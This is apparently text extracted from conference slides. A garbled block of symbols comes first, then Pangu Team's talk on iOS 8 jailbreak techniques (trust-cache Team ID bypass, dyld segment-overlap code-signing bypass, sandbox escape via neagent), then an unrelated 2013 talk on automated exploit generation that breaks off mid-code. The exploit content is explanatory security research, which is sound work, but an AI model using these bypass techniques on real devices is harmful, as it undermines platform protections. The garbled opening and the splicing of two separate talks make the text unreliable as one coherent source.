♥ ❧ ✐❾
q➍
q ✐ ♥q ❧ ✐ ➔ ❴➒
❥➎ ➨
3 q♥❽ ➍
❵ ♠➐3➐❻
↔ ❧ 3 ❵❽ ❻
✸ ➫ ✹ ✿ ❅➛ ➤
6 ❁ ❁ ✻s
❏ ❃ ▼ ❏ ✻ ❛ ✾ ❶ 4 4 8 ✾ ❂ ❂ ✸ 5 9 ❹➀
❶ ✸❬ ❶ ❸ ✶ 6 ✸ ➄ ✻ ❀ ❄❞
✼✽❨
✾ ❯ ✸ ◗ ✸↕
❃❛❨
✾ ❃❛ ❄ ➊ ✸➙
❏ ❳ ❳ ✼✽ ❳ ❃ ❛ ✾ ➁ 6 ❂ ❂ ❀ ❏s
❃ ▼ ❏ ✻ ❛ ❁✻ ❢ ❢ ✼❃ ❁ ❏❞
❀ ✼ ❂ ❃ ▼ ➅ ❃❛ ❃❀ 2 ❁ ❏ ❁ ▼ ✻ ❂ ✽ ✻❨
✽ ❃❳ ▼ ✼ ❁ ▼ ❏ ❛❨
✾ ➂ ❏ ❛ ❝➍
❧ ♥qq➏
❵ ✐ ❜ 3❧❾
♠❿
q➦ ➸ ➸ ➘
❭ ❪ ❫ ❴➎ ➴
❴➩ ➷ ➌
❵ ✐ ♠ q➍
✐ ❤ ♠ ❵ ❧ ✐ ❤ ❣ 3➐❻
↔ ❧ 3 ❵❽ ❻
❧ ✐❴ ❧❾
♠ ➝ ❤➍
q ♠ q3 ♠ ❵ ✐ ❜ ❤ ✐➏
❤ ✐ ❤ ❣➐
3 ❵ 3 ✸ 6 ◗ 7 ✾ ✵ 8 8 ❸ ✾ ❂ ❂ ✸➀
4 ❹ 8 ❸ ✸❬ ❶ 10 ✶ 7 ✸❺ ✉
❛ ➉ ✼✽ ✾ ✷ ✸➡ ✉ ✉ s
➉ ✾ 6 ✸➥
✼ ➅ ❛ ➉ ✼✽ ✾ ❃❛ ❄ 6 ✸ ❑ ❛ ❃❂ ❂ ✾ ➁✹ ❳ ▼➣❞
❃ ❁ ✼❄ ❢ ❃❀ ❁ ✼ ❂ ✻ ❁ ❏ ▼ ❏ ❍ ✼ ✼❀ ❏ ❳ ❏ ❛ ❃ ▼ ❏ ✻ ❛ ❏ ❛ ❁ ▼ ❃ ▼ ❏s
❂ ✽ ✻❨
✽ ❃❳ ❃❛ ❃❀ 2 ❁ ❏ ❁ ✾ ➂ ❏ ❛➷
❧➍ ❻
❤ ❣ ❫ q ♠❿
❧➏
3 ❤ ✐➏
❴ ❧❾
♠ ➝ ❤➍
q➒
✐ ❜ ❵ ✐ qq➍
❵ ✐ ❜ ✸ ✹ ❂ ✽ ❏ ❛❨
✼✽ ✾ ❶ 4 ✵ ❶ ✾❂ ❂ ✸ ❷ ✵ 5 ❹ ❷ ❷ ✵ ✸❬ ❶ 5 ✶➛
✸➥
✻ ✽❨
➬ ❃s
❁ ❃❛ ❄ 6 ✸ ✺ ✼✽ ▼ ✻ ❀ ❏ ❛ ✻ ✾ ➁➥
✼❃ ❁ ❏❞
❀ ✼ ▼ ✼ ❁ ▼ ❂ ❃ ▼ ➅ ❁ ✼❀ ✼s
▼ ❏ ✻ ❛❞
2❂ ✽ ❏ ❛s
❏ ❂ ❃❀❁ ❀ ❏s
❏ ❛❨
✾ ➂ ❏ ❛ ❭ ❪ ❫ ❴➎ ➴
❴➩ ➷ ➌
❴ ❧❾
♠ ➝ ❤➍
q➒
✐ ❜ ❵ ✐ qq➍
❵ ✐ ❜❥ ❧ ♠ q3 ✾ ❍ ✻ ❀ ✸ ❶ ❶ ✾ ❛ ✻ ✸ 5 ✸ ✹ ❂ ✽ ❏ ❛❨
✼✽➣
➃ ✼✽ ❀ ❃❨
❅ ✼ ➈ ➼ ✻ ✽ ➉ ✾➛
❛s
✸ ✾ ✵ 8 8 9 ✾❂ ❂ ✸ ❷ 9➀
❹ ❷ 8 ❸ ✸❬ ❶ 9 ✶ 7 ✸ ❅ ✸ ❅❨
✻ ❃❛ ❄➡
✸ ✺ ✸ ❑ ✸ ❯ ❃❛ ✾ ➁ ➊ ✼ ▼ ✼s
▼ ❏ ❛❨
❀ ❃✽❨
✼ ❛✉
❳❞
✼✽ ✻ ❢❏ ❛ ❢ ✼❃ ❁ ❏❞
❀ ✼ ❂ ❃ ▼ ➅ ❁ ▼ ➅ ✽ ✻✉ ❨
➅ ✽ ✼s
✻❨
❛ ❏ ➪❏ ❛❨
▼ ➅ ✼❏ ✽ ❂ ❃ ▼ ▼ ✼✽ ❛ ❁ ✾ ➂ ❏ ❛ ❝➍
❧❼♥qq➏
❵ ✐ ❜ 3 ❧❾
♠❿
q ♠❿
q➮
♠❿ ➱
❧ ❵ ✐ ♠❻
qq ♠ ❵ ✐ ❜ ❧❾
♠❿
q➒ ❽ ➍
❧ ↔ q ❤ ✐ 3 ❧❾
♠ ➝ ❤➍
qq ✐ ❜ ❵ ✐ qq➍
❵ ✐ ❜ ♥ ❧ ✐❾
q➍
q ✐ ♥q ❤ ✐➏
♠❿
q ❭ ❪ ❫ ❴➎ ➴
❴➩ ➷ ➌
3➐❻
↔ ❧ 3 ❵❽ ❻❧ ✐➌ ❿
q❾
❧❽
✐➏
❤ ♠ ❵ ❧ ✐ 3 ❧❾
3 ❧❾
♠ ➝ ❤➍
q q ✐ ❜ ❵ ✐ q q➍
❵ ✐ ❜ ✸ 6 ◗ 7 ✾ ❶ 4 4 9 ✾❂ ❂ ✸ ❶ ✵ 10 ❹ ❶ ❶ ❸ ✸
100The Userland Exploits of Pangu 8@PanguTeam

Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Team ID Validation by Teasing the Trust-Cache •Bypass Code Signing Validation by Segment Overlapping •Sandbox Escape •Conclusion
Pangu Team•Security research team in China •Focused on iOS security for more than 3 years •Release two untether jailbreaks in half a year  •2014.6 - Pangu Axe for iOS 7.1.x •2014.10 - Xuanyuan Sword for iOS 8-8.1
Pangu Team•Xiaobo Chen (@dm557) •Hao Xu (@windknown) •Tielei Wang (@INT80_pangu) •@ogc557 •@tb557 •@zengbanxian •Siglos (@0x557)
Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Team ID Validation by Teasing the Trust-Cache •Bypass Code Signing Validation by Segment Overlapping •Sandbox Escape •Conclusion
Team ID•Check the entitlements of binary built by latest Xcode •com.apple.developer.team-identifier

Data Protection•Data protection class •A - NSFileProtectionComplete •B - NSFileProtectionCompleteUnlessOpen •C - NSFileProtectionCompleteUntilFirstUserAuthentication •D - NSFileProtectionNone
Data Protection•Lots of files in “/var” are protected with •Class C - NSFileProtectionCompleteUntilFirstUserAuthentication •Even root cannot access those files if a device is never unlocked  •Create a file in “/var/mobile/Media” and print the attributes

Data Protection•Apple adds a special flag for folders •fcntl with F_GETPROTECTIONCLASS flag to get the protection class •0 for “/var/mobile/Media”

Data Protection•It is possible to change the protection class of folder to turn off the default protection •fcntl with F_SETPROTECTIONCLASS to set protection class = 4 which is NSFileProtectionNone
Launchd•Move core code from launchctl to launchd •Kill arguments normally used by jailbreak •“launchctl load -D all” no longer work •Strict loading process •Load all plist files from xpcd_cache.dylib •Assert plist files also exist in /System/Library/LaunchDaemons •If you want to load a service from /System/Library/LaunchDaemons, the plist file must exist in xpcd_cache
Launchd•Weakness •Other arguments still work •“launchctl load paths” •Putting your plist files in /Library/LaunchDaemons seems no difference
Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Code Signing Validation by Segment Overlapping •Bypass Team ID Validation by Teasing the Trust-Cache •Sandbox Escape •Conclusion
Tethered jailbreak
Backup
Restore
Deploy
Debug•Get a backup of iOS device 
Tethered jailbreak
Backup
Restore
Deploy
Debug•Inject an expired enterprise license •Turn off network connection •Inject an app containing a dylib signed  by the enterprise license
Tethered jailbreak
Backup
Restore
Deploy
Debug•Mount the developer disk image •Instruct debugserver to debug neagent •Force neagent to load the dylib by setting DYLD_INSERT_LIBRARIES
Tethered jailbreak
Backup
Restore
Deploy
Debug•Attack kernel through the dylib •Disable sandbox •Modify rootfs to place libmis.dylib and  enable-dylibs-to-override-cache •Adjust the boot sequence of launchd daemons
Untethered jailbreak•Bypass Code Signing •Bypass Team ID validation•Exploit and patch the kernel
Run Untethered 
Payload 
Disable AMFID
Launch The Rest 
Services 
Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Team ID Validation by Teasing the Trust-Cache •Bypass Code Signing Validation by Segment Overlapping •Sandbox Escape •Conclusion
Team Identifier Verification•A new security mechanism introduced in iOS 8  •A team identifier (Team ID) is a 10-character alphanumeric string extracted from an Apple issued certificate.

Team Identifier Verification•A program may link against any platform library that ships with the system or any library with the same team identifier in its code signature as the main executable. •System executables can only link against libraries that ship with the system itself.

Troubles for jailbreak•Code signing bypass  •Method: force dyld to load a fake libmis.dylib •evasi0n, evasi0n 7, pangu 7 •Challenge: the fake libmis.dylib must also pass the TeamID validation  •Sandbox escape •Method: Inject a dynamic library signed by a developer license into system processes, e.g., setting DYLD_INSERT_LIBRARIES •Challenge: the injected library has to pass the TeamID validation 
Team ID verification Implementation •AppleMobileFileIntegrity hooks the mmap function •When a file is mapped into memory: •csfg_get_platform_binary •csfg_get_teamid •csproc_get_platform_binary •csproc_get_teamid
if (permissions & PROT_EXEC)csfg_get_teamidcsfg_get_platform_binary if(the lib has no team id && is not a platform binary)
if(main executable has com.apple.private.skip-library-validation)PASS
csproc_get_teamidcsproc_get_platform_binaryif(main executable has no team id && is not a platform binary)if(the lib is not a platform binary)
if(main executable is a platform binary)if(main executable’s team id != lib’s team id)PASS
PASSFAIL
if (permissions & PROT_EXEC)csfg_get_teamidcsfg_get_platform_binary if(the lib has no team id && is not a platform binary)
if(main executable has com.apple.private.skip-library-validation)PASS
csproc_get_teamidcsproc_get_platform_binaryif(main executable has no team id && is not a platform binary)if(the lib is not a platform binary)
if(main executable is a platform binary)if(main executable’s team id != lib’s team id)PASS
PASSFAIL

Who has the com.apple.private.skip-library-validation 
Good News: neagent has the entitlement 
Bad News: neagent is the only one with the entitlement 

Recall: Troubles for jailbreak•Code signing bypass  •Method: force dyld to load a fake libmis.dylib •Challenge: the fake libmis.dylib must also pass the TeamID validation  •Unsolved•Sandbox escape •Method: Inject a dynamic library signed by a developer license into system processes, e.g., setting DYLD_INSERT_LIBRARIES •Challenge: the injected library has to pass the TeamID validation  •Solved:  inject the library to neagent
if (permissions & PROT_EXEC)csfg_get_teamidcsfg_get_platform_binary if(the lib has no team id && is not a platform binary)
if(main executable has com.apple.private.skip-library-validation)PASS
csproc_get_teamidcsproc_get_platform_binaryif(main executable has no team id && is not a platform binary)if(the lib is not a platform binary)
if(main executable is a platform binary)if(main executable’s team id != lib’s team id)PASS
PASSFAIL

How does iOS confirm a platform binary?

How does iOS confirm a platform binary?•Trust Cache •The kernel records the hash values of system executables •Rather than storing the hash value of the whole file, the trust cache only stores the sha1 value of the CS_CodeDirectory structure of the code signature segment in a system executable
Fake libmis with a “correct” code signature segment
fake libmisreal system executable
code signature segmentcode signature segmentcopy
Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Team ID Validation by Teasing the Trust-Cache •Bypass Code Signing Validation by Segment Overlapping •Sandbox Escape •Conclusion
Code Signing Workflow
 If in Trust CacheAMFI kextIf trustly signedUserland AMFIDPASSExecveKernel
PASS
FAILHASH comparison happens later
HASH comparison happens later
Code Signing Workflow
 If in Trust CacheAMFI kextIf trustly signedUserland AMFIDPASSExecveKernel
PASS
FAILHASH comparison happens later
HASH comparison happens latercall MISValidateSignature in libmis.dylib 
High Level Idea•First proposed by evad3rs since evasi0n 6 •Use a simple dylib with no executable pages to replace libmis.dylib •The simple dylib itself does not trigger code signing checks at all, but it can interpose critical APIs responsible for the code signing enforcement 
Code Signing Bypass
 If in Trust CacheAMFI kextIf trustly signedUserland AMFIDPASSExecveKernel
PASS
FAILHASH comparison happens later
HASH comparison happens laterFake libmis.dylib and re-exports MISValidateSignature always returning 0
How to construct the dylib
Macho HeaderTEXT segmentLINKEDIT segment...Dyld re-expot info_MISValidateSignature_kMISValidation..._CFEqual_kCFUserNotification...libmis.dylibamfid
Remove X bit No codesign checking
TEXT Segment AR.-.X
TEXT Segment AR.-.XVMAddr: 0 VMSize: 4KBMach O File in DiskMemory
TEXT Segment BR.-.-VMAddr: 0 VMSize: 4KBLoading into MemorySegment Overlapping Attack in evasi0n 6
TEXT Segment AR.-.-
TEXT Segment AR.-.XVMAddr: 0 VMSize: 4KBMach O File in DiskMemory
TEXT Segment BR.-.-VMAddr: 0 VMSize: 4KBLoading into Memory
TEXT Segment BSegment Overlapping Attack in evasi0n 6
Review the fix•It is really a challenge for us to find a new code sign exploit •We reviewed the latest dyld source code carefully •How did Apple fix the segment overlapping problem?

Segment Overlapping’s Revenge in Pangu 7uintptr_t end = segCmd->vmaddr + segCmd->vmsize; loadCommandSegmentVMEnd  = segCmd->vmaddr + segCmd->vmsize; •Integer overflow will cause the overlapping check to be bypassed•Finally we can still force two segments to overlap 
TEXT Segment AR.-.X
TEXT Segment AR.-.XVMAddr: 4KB VMSize: -4KBMach O File in DiskMemory
TEXT Segment BR.-.-VMAddr: 4KB VMSize: -4KBLoading into MemorySegment Overlapping’s Revenge in Pangu 7
TEXT Segment AR.-.-
TEXT Segment AMach O File in DiskMemory
TEXT Segment BLoading into Memory
TEXT Segment BSegment Overlapping’s Revenge in Pangu 7R.-.XVMAddr: 4KB VMSize: -4KBR.-.-VMAddr: 4KB VMSize: -4KB
Apple’s fix in iOS 8•To fix Pangu7’s codesign exploit, Apple adds more checks to the 1st R-X segment •vmsize can’t be negative •vmaddr + vmsize cannot overflow any more

The new problem in iOS 8•The added checks do not apply to other segments! 
•No negative or overflow checking for other segments!
http://opensource.apple.com/source/dyld/dyld-353.2.1/src/ImageLoaderMachO.cpp
Segment Overlapping’s Revenge in Pangu 8 •What did Pangu8 do •dyld will first allocate a memory range for the first segment base on its vmaddr  •We can make the second segment to overlap the first one again by setting the second segment’s vmaddr and vmsize

TEXT Segment AR.-.X
TEXT Segment AR.-.XVMAddr: 0KB VMSize:  4KBMach O File in DiskMemory
TEXT Segment BR.-.-VMAddr: -4KB VMSize:  4KBLoading into MemorySegment Overlapping’s Revenge in Pangu 8
TEXT Segment AR.-.-
TEXT Segment AMach O File in DiskMemory
TEXT Segment BLoading into Memory
TEXT Segment BSegment Overlapping’s Revenge in Pangu 8R.-.XVMAddr: 0KB VMSize:  4KBR.-.-VMAddr: -4KB VMSize:  4KB
•What did Pangu8 do •The dyld’s debugging output while loading  Pangu8’s limbs.dylib 
•We can still do the overlap segment attack!
Segment Overlapping’s Revenge in Pangu 8

Apple’s fix in iOS 8.1.1•Apple added vmsize and filesize checks in ImageLoaderMachO::sniffLoadCommands
Hey Apple, do you really understand the issue?
Apple’s fix in iOS 8.1.1•The issue is about overlap in vmaddr  
•Checks on vmsize/file size do not help at all •We can still adjust vmsize in our codesign exploit and it is still working on iOS 8.1.1 - 8.1.2

Apple’s final fix in iOS 8.1.3•Apple adds more checks for vm/file content overlapping 
•Bypassable? 

Outline•Introduction •New Security Enhancements in iOS 8 •Pangu 8 Overview •Bypass Team ID Validation by Teasing the Trust-Cache •Bypass Code Signing Validation by Segment Overlapping •Sandbox Escape •Conclusion
Why we chose neagent•Kernel exploits against IOHIDEventService require a loose sandboxed environment •We have to bypass the Team ID verification at the first step •debugserver + neagent is the perfect target
Forcing neagent to load our library•Solution: leverage idevicedebug in the libimobiledevice package to communicate with debugserver in the iOS device

Apple’s fix in iOS 8.1.2 •Apple only allows debugserver to launch executables with debug-mode

Conclusion•Developing an untethered jailbreak requires a lot of effort •Apple made similar mistakes again and again •Next jailbreak?
Thanks•Thank all of you •Thanks Apple for bringing us such great devices •Thanks the jailbreak community •special thanks goes to evad3rs, saurik and iH8sn0w  •Thanks for open source project libimobiledevice and Duilib
Q & AThe Automated Exploitation 
Grand Challenge  
Tales of Weird Machines  
 
Julien Vanegue  
julien.vanegue@gmail.com  
 
H2HC conference, Sao Paulo, Brazil  
October 2013  
Acknowledgements  
I am indebted to many people for their work on Program Analysis and 
Exploitation:  
 
Julio Auto, Thomas Ball, Dion Blazakis , Pascal Bouchareine , Sergey Bratus , Nicolas 
Brito , Michal Chmielewski , Gynvael  Coldwind , Solar Designer, Mark Dowd, Thomas 
Dullien , Sergiusz  Fonrobert , Mathieu Garcia, Thomas Garnier , Travis Goodspeed , 
Patrice Godefroid , Sean Heelan , Ronald Huizer , Vincenzo Iozzo , Barnaby Jack 
(R.I.P .), JP , Ken Johnson, Mateusz Jurczyk , Michel ‘ MaXX ’ Kaempf , Tim Kornau , 
Kostya  Kortchinsky , Sebastian Krahmer , Joshua Lackey, Shuvendu  Lahiri , Eric 
Landuiyt , Xavier Leroy, Felix ‘FX’ Lindner, Tarjei  Mandt , Damien Millescamps , Matt 
Miller , John McDonalds, David Molnar, Julien Palardy , Enrico Perla , Paul @ pa_kt , 
The PaX Team, Willem Pinckaers , Rolf Rolles , Gerardo Richarte , Dan Rosenberg, 
Sebastien  Roy, Fermin  Serna, Scut , Sysk , Alex Sotirov , Julien  Tinnes , Richard Van 
Eeden , Ralf -Phillipp  Weinmann , David Weston, Rafal  Wojtczuk , Michael Zalewski . 
  
        You are an inspiration for the Automated Exploitation Grand Challenge  
 
                                                          Thank you  
2 
What is Automated Exploitation?  
•The ability to generate a successful computer 
attack with reduced or entirely without 
human interaction.  
•It is important to understand the hardness of 
AE to measure the risk on critical 
infrastructure and online properties.  
•There are many domains of attack: network, 
web, kernel, system, hardware, applications. 
Our focus today is on software security.  
 
3 
What are Weird Machines?  
•Weird Machine (WM): “The underlying capacity 
of a program to perform runtime computations 
that escape the program specification”  
 
(1)If extra computations are consistent with the 
intended program specification, the WM can 
lead to a covert execution  of code within the 
program.  
(2)If extra computations violate the intended 
program specification, the WM can lead to a 
security exploit (what we will talk about today).  
 
 4 
Today’s exploits techniques  
Modern history of exploit techniques : 
 
•Code -reuse attacks: C omputations without code 
injection  
–Started with “Return into Libc” (Solar Designer’s 1997)  
–Advanced by “Return into PLT” ( Rafal  Wojtczuk’s  1998)  
–Generalized by Chunk reuse (“borrowing”) technique  
     (Richarte  2000, Krahmer  2005)  
–Since 2008, known as “Return Oriented Programming”  
 
•Meta -data corruption  
–“Smashing C++ VPTRs” (Eric Landuiyt , 2000)  
–“V00d00 malloc  tricks” (Michel Kaempf , 2001)  
–Many, many other papers.  
 
 5 
Today’s exploits techniques (2)  
•Information disclosure attacks  
–Format bugs (tf8 wu-ftpd 2.6 site -exec exploit, ~ 2000)  
–Weaknesses where content or address of target 
variables/functions can be read (BIND TSIG Exploit by LSD -
PL, Openssl -too-open exploit by Sotirov , ~ 2001)  
–“Return into printf /send” (“Bypassing PaX ASLR 
protection”, Vanegue  2002)  
•Heap chunks alignment  techniques  
–“Advanced DL malloc  exploit” (JP @ core -st , 2003)  
–“Heap Feng  Shui ”, (Sotirov , 2007)  
•JIT attacks : make target generate “chosen” new code  
–“Pointer inference and JIT spraying” ( Blazakis , 2010)  
 
 6 
Exploit Mitigations  
•Data Execution Prevention (DEP/ Openwall /PaX/W^X/ etc) 
•Address Space Layout Randomization (ASLR)  
•Control -Flow Integrity (CFI)  
•Intra -modular displacement randomization (IDR)  
•Heap randomization (non -deterministic fitness algorithms)  
•Many others targeted protections (UDEREF, SEHOP , canary 
insertion, meta -data encoding, etc) 
 
Full AE Models : The Automated Exploitation (AE) problem is 
solved if mitigations can be bypassed using minimal to no human 
interaction.  
 
Restricted AE Models : Academic exercise where mitigations are 
ignored. Not the subject of this talk.  
7 
Control Flow Integrity  
•Early implementation by Determina  called 
“Program Shepherding” early 2000. Formalized 
by Martin Abadi  et al. in 2005. A lot of work done 
at Microsoft, Intel, and more to make it practical 
– its hard.  
•In a nutshell (idealized) :  
–Enforce strict transitions on the control flow graph, in 
particular between functions.  
–If A  B and B –ret A , then A  C is forbidden, so 
is B –ret D (for C and D any other two functions)  
•Consequence: Exploit cannot easily corrupt a 
function pointer or a return address and execute 
a ROP payload.  
8 
Intra -modular Displacement 
Randomization  
•[Miller, Johnson, Goel , Vanegue , 2011] at Microsoft 
Security . (http://ip.com/IPCOM/ 000210875 ) 
•Core idea: randomize address space not only using 
module base address randomization, but also within a 
module (ex: between functions).  
–Ability to change function relative address from the base 
address every time a program is executed.  
•Consequences:  
–Base address information disclosure is not enough to 
predict addresses of ALL gadgets in a module.  
–Attacker worst case: need one information disclosure per 
randomization point inserted in the module.  
 
 
 9 
Exploit primitives  
•Two major families of exploit primitives are 
write primitives (write address space) and 
read primitives (read address space).  
•Early classification done by Gerardo Richarte  
at core -st : “About exploit writing”, 2002.  
•Modern classification done by Matt Miller: 
“Modeling the exploitation and mitigation of 
memory safety vulnerabilities”, 2012.  
 
10 
Exploit write primitive  
General form: *(basepointer  + offset) = value  
 
(1) Base, offset and values are attacker -controlled  
Write controlled value at controlled location  
 
(2) Base and offset are controlled  
Write uncontrolled value at controlled relative location  
With an information disclosure, can always be used to uncover new 
state space or elevate privileges  
 
(3) Only RHS Value is controlled (totally or partially)  
Write anything at fixed location  
Can be useful if value is:  
-Later used as base pointer, index, or offset (we fall into case 1 or 2)  
-Used in a control predicate and can uncover new “weird” state space  
-Controlling privilege level of application  
11 
Exploit read primitive  
General form: value = *( basepointer  + offset)  
 
(1) Base, offset and values are attacker -controlled  
Read value at desired location and store it at desired location  
 
(2) Base and offset are controlled  
Read value at desired location, store it at uncontrolled location  
Only useful if uncontrolled location can be read by attacker  
 
(3) Only LHS Value is controlled  
Read internal program value and store it at desired location  
Can be useful if value is:  
-Internal program value is a direct code or data address  
-Internal program value contains credentials (password, key, token, etc) 
-Internal program value help deduce useful address info or credentials  
12 
Rising exploit techniques  
•Data -only attacks (DOA)  
–Change internal program values to elevate privileges 
without changing Program control flow.  
–Infer address of data in program without direct 
memory read primitives.  
•Program Likelihood Inference (PLI)  
–Probabilistic attacks: discover most likely executions 
to successful exploitation in non -deterministic 
environment.  
–Timing attacks: discover internal program information 
via run time execution measurements.  
13 
 
 
Tools Armory  
14 
Exploit Generation  
•Automated Exploitation focuses on discovery and 
combination of write primitives and read primitives.  
•Automated Exploitation in Full Model is a very hard 
problem. Anybody telling you otherwise is a fool or an 
impostor . 
•Existing AE work focused on Restricted Models:  
–Sean Heelan’s  “Automatic Generation of Control Flow 
Hijacking Exploits for Software Vulnerabilities” : 
http://www.cprover.org/dissertations/thesis -Heelan.pdf  
–David Brumley  et al. (AEG, MAYHEM, etc) 
http://users.ece.cmu.edu/~dbrumley/pubs.html  
15 
Analysis and Exploit Automation  
•Compilers   (Program transformation)  
•Fuzz testers (Input generation)  
•SMT solvers (Symbolic reasoning)  
•Model Checkers (State space exploration)  
•Symbolic Execution Eng (Path generation)  
•Emulators (Machine modeling)  
•Abstract interpreters (Abstraction)  
16 
SMT solvers  
SMT = Satisfiability Modulo Theories  
 
•Give it a list of variables and constraints on them, 
will tell you whether the set of constraints is 
satisfiable.  
•A good representation to reason about a program 
(e.g. translate a program into an SMT formulae)  
•Can track feasibility of predicates, eliminate 
impossible program paths, etc.  
 
EXAMPLE 1:  (B >= A) && (A <= B) is SAT  
EXAMPLE 2:  A && B && NOT(A&&B) is UNSAT  
 17 
An open -source SMT solver : Z3  
•Z3 is a state -of-the-art SMT solver developed in 
Microsoft Research RiSE  group.  
•Understand equalities, arrays, bitvectors , 
uninterpreted  functions, and custom theories.  
•Makes SMT a good symbolic representation to 
reason about programs (e.g. by translating it into 
SMT formulae).  
 
           Try by yourself on http://rise4fun.com/Z3/  
 
 18 
F(int c) 
{ 
  int ret; 
  if (c < 10)  
     ret = 1;  
 else 
   ret = 2;  
} (declare -fun x () Int) 
(declare -const  ret Int) 
(declare -const  c Int) 
(assert (=> (>= c 10) (= ret 2)))  
(assert (=> (<  c 10) (= ret 1)))  
(assert (= ret 1 )) // check me!  
(check -sat) 
(get-model)  Example of translation from C to SMT  
19 
Z3 output:  
sat (model  
  (define -fun c () Int 9) 
  (define -fun ret () Int 1) ) Output model for constraint set  
•A model is a valuation of the variables for which a 
(SMT) formula is true.  
•In this example, the constraints set is satisfiable if 
variable C = 9 and RET = 1  
•Change the last assertion of previous slide and 
see what happens to the model.  
20 
HAVOC: static analysis for C/C++  
•HAVOC: Verifier for C(++) programs  
   http://research.microsoft.com/en -us/projects/havoc/  
•Translate C/C++ code to Boogie IR   
   (Open source at: http://boogie.codeplex.com ) 
•Boogie IR is then translated to SMT formulae 
understood by Z3, which performs SMT check and give 
you a model.  
•At Microsoft, HAVOC helped found 100+ security 
vulnerabilities in Windows and Internet Explorer.  
•Experiments documented in: “Towards practical 
reactive security audit using extended static checkers” 
(Vanegue  / Lahiri , 2013) 
http://research.microsoft.com/pubs/185784/paper.pdf  
 21 
Problem: non -deterministic programs  
Heap in 90% of executions of program P :  
Heap in 10% of executions of program P :  
Chunk 1, Size S1, Addr  
A1 
Chunk 2, Size S2, 
Addr  A2 = A1 + S1  
Chunk 3, Size S3,  
Addr  A3 = A2 + S2  
Chunk 1, Size S1, Addr  
A1 
Chunk 3, Size S3,  
Addr  A2 = A1 + S1  
Chunk 2, Size S2, 
Addr  A3 = A2 + S3  S1 =  
S2 =  
SMT solvers are unable to reason about non -determinism  Assume an attacker can overflow chunk 1 and chunk 3 is a target:  
22 
Idea: Markov exploits  
•Andrei Markov (1856 -1922)  
•Systems (Programs) may seem 
to act randomly, but have a 
hidden probabilistic regularity.  
•Instrument program and 
deduce from sampling which 
paths have most chance to 
bring the heap in a desired 
exploitable state.  
23 
Markov transition system  
S1 
S2 
S3 
S4 
S5 
S6 
     0.9      
0.1 
     0.6 
     0.4      
0.95  
     
0.05  
 
       The transition system models the set of all possible random walks.  
24 
Markov transition system  
Previous slide explained:  
 
•We computed the probability of reaching every heap states in a 
maximum of two heap interactions ( malloc , free, etc) 
•Probability of reaching S4 is:  
     P(S4) = P( S4|S2) * P(S2|S1) = 0.6 * 0.9 = 0.54 (54%)  
•Probability of reaching S5 is:  
     P(S5) = P(S5|S2) * P(S2|S1) + P(S5|S3) * P(S3|S1)  
     = 0.9*0.4 + 0.95*0.1 = 0.455 (45.5%)  
•Probability of reaching S6 is:  
     P(S6) = P(S6|S3) * P(S3 | S1) = 0.1 * 0.05 = 0.005 (0.5%)  
  
Assuming S5 and S6 are the only two desired exploitable states,  
the most exploitable random walk ends in S5.  
25 
Markov Exploit Food for thoughts  
•Paths exploration strategy can be static or 
dynamic (planned, or constructed on the fly)  
•If one creates an accurate heap manager 
specification, heap state measurement could be 
static, but this is a very hard and allocator -
dependent task.  
•Most likely, one needs to execute program and 
instrument debugger to measure heap state 
when heap operations are performed.  
•After monitoring, one can construct the Markov 
transition system based on sampled program 
paths. More samples means heap model is more 
accurate . 
26 
Markov Exploit Food for thoughts (2)  
•Determine list of possible heap interactions ( malloc , 
free, etc) sequences in a given program. A single 
unique sequence may be represented by multiple 
random walks due to non -deterministic heap manager 
behavior.  
•Determine sequence maximizing probability of 
reaching desired heap state in a minimum amount of 
steps. A SMT solver can be used to craft corresponding 
input based on encountered path predicates.  
•A range of Markov models can be used to facilitate 
encoding of heap structure into a probabilistic 
transition system (Markov chain, Markov network, etc) 
27 
 
 
Challenge problems  
28 
 
 
            Hilbert’s program   
 
 
•In 1900, German mathematician David Hilbert 
formulates a list of 23 hard problems touching 
the foundations of mathematics. Five of these 
problems remain unsolved today.  
 
http://en.wikipedia.org/wiki/Hilbert's_program  
29 
A Program for Automated Exploitation  
•Inspired by David Hilbert and many ones after 
him, we define a list of problems whose solutions 
pave the way for years to come in the realm of 
automated low -level software analysis.  
•The Grand Challenge consists of a set of 11 
problems in the area of vulnerability discovery 
and exploitation that vary in scope and 
applicability.  
•Most problems relate to discovering and 
combining exploit primitives to achieve elevation 
of privilege.  
30 
Exploit challenges are not new  
•Gerardo Richarte’s  insecure programming (from 10 
years ago!) constitutes great training for manual exploit 
writing:  
 
http://community.coresecurity.com/~gera/InsecurePro
gramming / 
 
 
•Many of the “Capture the Flag” events are, in essence, 
manual exploit challenges.  
•In this challenge, we expect exploits to be generated 
automatically instead of written manually.  
31 
Nature of Grand Challenge problems  
•Exploit Specification problem (A, H)  
•Input generation problems (B, C, D, E)  
•Exploit Primitive composition problem (F)  
•Environment determination (I, J, K)  
•State space representation (G)  
 
Not all problems need to be resolved for a 
given target as different problems cover 
different exploit scenarios.  
 
 
 32 
Grand Challenge Evaluation  
Two main problems of Automated Exploitation are 
Vulnerability Discovery and Vulnerability Exploitation. 
Solutions to challenge problems must be evaluated on 
their varying degree of:  
 
•Soundness (Precision and Signal/Noise ratio)  
•Expressivity (Applicable domain and Configurability)  
•Scalability (Automation and Performance)  
•Completeness (Coverage)  
•Resilience (to Environment and Exploit Mitigations)  
 
 33 
Exploit specification  
Problem A: Given a program P , determine the 
set of assertions S for which satisfying any a in S 
is equivalent to  corrupting the program.  
 
In other words,  
     what is the program P anti-specification ?  
34 
Problem A code  
F(int x, int y) 
{ 
    int loc[4]; 
    int idx = G(x, y);  
    if (idx > 4) 
       return -1; 
    assert( idx >= 4); // do infer assertion  
    loc[idx] = 0x00;  
} 
35 
Pre/post -conditions inference  
Problem B:  Given a program function and an 
assertion in the function, determine the necessary 
and sufficient pre/post conditions such as the 
assertion is true if and only if the pre/post 
conditions is true.  
 
This is equivalent to the input generation problem 
(we start with loop -free programs).  
 
Note: May need to walk over call graph to resolve 
problem transitively from entry point to assertion.  
36 
Problem B code  
PRECOND (?)  
F(int x, int y) 
{ 
   int array[4];  
   int idx = G(x + y);  
   assert( idx >= 4);  
   array[ idx] = 0;  
} PRECOND (?)  
Int G(int x, int y) 
{ 
  if (x < y) return x;  
